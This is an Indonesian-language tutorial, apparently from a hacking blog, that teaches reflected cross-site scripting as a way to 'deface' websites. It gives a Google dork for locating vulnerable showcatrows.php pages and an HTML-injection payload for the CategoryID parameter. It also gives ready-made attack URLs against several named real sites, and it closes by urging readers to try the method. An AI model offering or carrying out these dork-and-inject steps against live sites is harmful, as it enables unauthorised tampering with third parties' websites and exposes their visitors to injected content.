XSS Vulnerability

XSS Vulnerability

XSS merupakan kependekan yang digunakan untuk istilah cross site scripting. XSS merupakan salah satu jenis serangan injeksi code (code injection attack). XSS dilakukan oleh penyerang dengan cara memasukkan kode atau client script code lainnya ke suatu situs. Serangan ini akan seolah - olah datang dari situs tersebut. Akibat serangan ini antara lain penyerang dapat mem-bypass keamanan di sisi klien, mendapatkan informasi sensitif, atau menyimpan aplikasi berbahaya.

Dan kali ini saya akan tunjukkan cara deface web menggunakan XSS. Mudah kok.

1. Ketik dork berikut ke google inurl:"/showcatrows.php?CategoryID="

2. Akan banyak web yang muncul, silahkan anda pilih salah satu untuk dieksekusi

3. Jika sudah masuk ke webnya, coba perhatikan url'nya. Pasti berakhiran angka kan? Nah dibelakang
angka itulah kita masukkan kode html kita. Contoh : http://scriptreseller.com/showcatrows.php?
CategoryID=2%22%3E%3Cmarquee%3E%3Ch1%3EHappy+Valentine+Day+By+R4MANDRO1D%3C%2Fh1%3E%3C%2Fmarquee%3E

4. Jadi dibelakang url tersebut masukkan kode seperti ini"><marquee><h1>Hacked+By+Blablabla+-+Blablabla<%2Fh1><%2Fmarquee>

5. Selesai, maka text yang ada di kode html anda akan muncul di web tersebut

Contoh:
1. copy dork , dan pastekan ke kotak pencarian google
2. contoh saya memilih target> http://www.ti-com.info/showcatrows.php?CategoryID=1
3. lalu pastekan ini > "><marquee><h1>Hacked+By+Blablabla+-+Blablabla<%2Fh1><%2Fmarquee> ke blakang url web target tdi

contoh EKSEKUSI::>>
http://www.ti-com.info/showcatrows.php?CategoryID=1%22%3E%3Cmarquee%3E%3Ch1%3EHacked+By+NyanmaruXCoder+-+NyanmaruXCoder%3C%2Fh1%3E%3C%2Fmarquee%3E

http://www.examsolutions.net/maths-revision-papers/showcatrows.php?CategoryID=13%22%3E%3Cmarquee%3E%3Ch1%3EHacked+By+NyanmaruXCoder+-+NyanmaruXCoder%3C%2Fh1%3E%3C%2Fmarquee%3E

SELAMAT MENCOBA :)
./NyanmaruXCoder